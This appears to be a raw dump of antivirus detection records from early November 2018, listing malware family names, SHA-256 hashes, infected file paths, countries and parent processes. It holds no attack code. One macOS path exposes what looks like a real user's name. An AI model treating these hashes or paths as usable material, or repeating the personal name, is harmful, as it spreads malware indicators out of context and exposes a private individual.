  Row(detection=Row(filename='avscan-20181104-075113-60fad743', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24dc9eb5\\AVSCAN-20181104-074808-392E2EED\\AVSCAN-20181104-075113-60FAD743', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:51:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b323a3c9b0e4c4dc306af3f1b0b70f4c3446247babeff1fae80a870fcab53cbd', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T19:50:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:01:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T00:49:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T05:17:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unt591a.tmp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\U5919.tmp\\UNT591A.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4affd24c9f82a4b944e5341be867198ae6877557d7f1f50d6618ca2cbb7f6c91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:28:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-211229-083d522e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_947ae14e\\AVSCAN-20181103-211151-015901F8\\AVSCAN-20181103-211229-083D522E', filesize=8000000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:12:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-065751-c297ac04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99b6583d\\AVSCAN-20181105-063616-3B39D34A\\AVSCAN-20181105-065751-C297AC04', filesize=6200000, name='ADWARE/InstMonster.Gen7.#M1.#R1'), hash='40a2b8bcb78afb68c633b08ba494345f271f77e2173f8caf08d2c7fbe17c91ae', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:58:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102348-b88a91fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102348-B88A91FD', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:23:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fasil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fasil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='7a7861079f8bfbb11f413c6082bea20597e46c1b72e952e225c0cab6f75fbb4c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:26:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_2450316e.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_2450316e.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\40e0103692e1ebbb162ed295f786b047\\x86_Microsoft-Windows-Client-Features-Package~~X86~~10.0.17134.1\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\castsrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:47:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083147-b9e44f4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083147-B9E44F4E', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='games.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\VOLUMES\\GAMES\\GAMES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ddf1469c3db57da48f38b77a9d2163df358a7c1a2bf39e7cba25055de4bbceb9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081159-221a8ff5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081017-150DB878\\AVSCAN-20181102-081159-221A8FF5', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:11:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='season 3.exe', filepath='/Volumes/Untitled 1/\xa0/IF LOVING YOU IS WRONG/Season 3/Season 3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M2.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='driverquery.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\driverquery.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96f25ee77a87eda83cc41b471e698901aaa78954056ec35403055298a3d60d49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\New Outlander MY16_Inglês\\16OUTLANDER_ENG (E)\\TOOL\\VISTAMSV\\ENV\\VISTAMSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='80eaefa55d87aefb707b91efc202b13c22413f8ff6aad64dee6ab9bbc3441425', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goku kid.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku kid\\Goku kid.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='af7c388430851abc1301d292822555af10a55bd51dcb640ef2841d67e170b264', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105808-83730b51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a4a2b196\\AVSCAN-20181102-105058-296886CB\\AVSCAN-20181102-105808-83730B51', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='962c810f33f5428faa0e34324f51f035ddda06413c0b30b4a236bf1a3a56ffc6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b2dde69d03d7619fa9bab5de842250cb68a30a46dbc2bc92ec68a3743ca5219', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\8B2DDE69D03D7619FA9BAB5DE842250CB68A30A46DBC2BC92EC68A3743CA5219', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b2dde69d03d7619fa9bab5de842250cb68a30a46dbc2bc92ec68a3743ca5219', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112020-eb6df745', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c473c1\\AVSCAN-20181102-111947-E5B30F1E\\AVSCAN-20181102-112020-EB6DF745', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vvtqhhhd.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\vVtqHHhD.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212545-35f18de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47baa8ee\\AVSCAN-20181102-212522-31D92C15\\AVSCAN-20181102-212545-35F18DE6', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:25:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adb.exe', filepath='E:\\Program Files\\SRSRoot\\adb.exe', filesize=896000, name='W32/Sality.AT.#M1.#R1'), hash='dba925fd5808e08c2accddcbf25f4ec77c6b72268dbed4df221f1ddea2015655', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:57:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ppsshwmq.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\pPsSHwmq.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gfteryzciel.exe', filepath='c:\\users\\X\\appdata\\roaming\\gfteryzciel.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup1.exe', filepath='D:\\ROUGH\\E DRIVE\\NEW SMART SPOKEFULL PACKAGE\\SPOKE PACKAGE\\Support\\SETUP1.EXE', filesize=512000, name='TR/Dropper.Gen.#M2.#R2275'), hash='f54bf64c8be03ce2977e180d2220fda0e9e277650577a9bcae0434f6a59b3da5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T12:09:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dc09b13907da4eb4aabc532873ed114df8ece1b1c478e5c0efef03b63dbcc7b8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\DC09B13907DA4EB4AABC532873ED114DF8ECE1B1C478E5C0EFEF03B63DBCC7B8', filesize=384000, name='DR/Delphi.Gen.#M300.#R273'), hash='dc09b13907da4eb4aabc532873ed114df8ece1b1c478e5c0efef03b63dbcc7b8', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:07:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065333-6a1832d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-065333-6A1832D2', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161312-75b69e32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_69714a56\\AVSCAN-20181102-161235-6E676A89\\AVSCAN-20181102-161312-75B69E32', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:13:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\h5yqnl5yb4e\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eset nod32 antivirus 2018 crack license key.exe', filepath='G:\\ESET NOD32 ANTIVIRUS 2018 CRACK LICENSE KEY.EXE', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='cd19a1613937f7a5122a4248ddab7e2efb80d8b5ce073e75d8845bfad91163e7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674872, timestamp='2018-11-02T13:42:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1fljnoj43kq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d922a3297ae1ebb739432aeeeba1efbc3671d3a1d172ba458618732fd5fef2ef', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='e4174a525b5e10e5fb530b6aa34541f89d3faec763d225464f8b3e2799f678d9', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:53:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082835-109f2d62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-082835-109F2D62', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vboxsharedclipboard.dll', filepath='C:\\Arquivos de programas\\Bignox\\BigNoxVM\\RT\\VBoxSharedClipboard.dll', filesize=112000, name='W32/Ramnit.C.#M1.#R1'), hash='b11ae4aec1932f2ac7114fda90b2cce0a04bc25d7eb64a7af5470be99403a8b2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='netreg.exe', filepath='D:\\Sürücüler\\Güvenlik Yazılımı\\Drive Vaccine PC Restore Plus\\program files\\Shield\\netreg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='db43f0d680f25aeb6aa829f09732c4697744516b181fd58476c10149f26e61da', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T10:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pc3exe.exe', filepath='e:\\computer\\programs engineering\\autocad_2017\\autocad_2017_english_win_64bit_dlm\\x64\\acad\\program files\\root\\pc3exe.exe', filesize=556000, name='W32/Neshta.A.#M1.#R1'), hash='945f4ba6d7e05428d1db502ea61e05734a72bd1a02e7636e03d8c534276b5ebc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gplot.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\gplot.exe', filesize=384000, name='W32/Ramnit.CD.#M1.#R1'), hash='c401e13e7cadebbb2643eee40e9265fda2d2dc576841233596966f26a6f24ec4', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:12:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291fee', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291fee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:03:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:33:49Z'), dt=datetime.date(2018, 11, 4)),
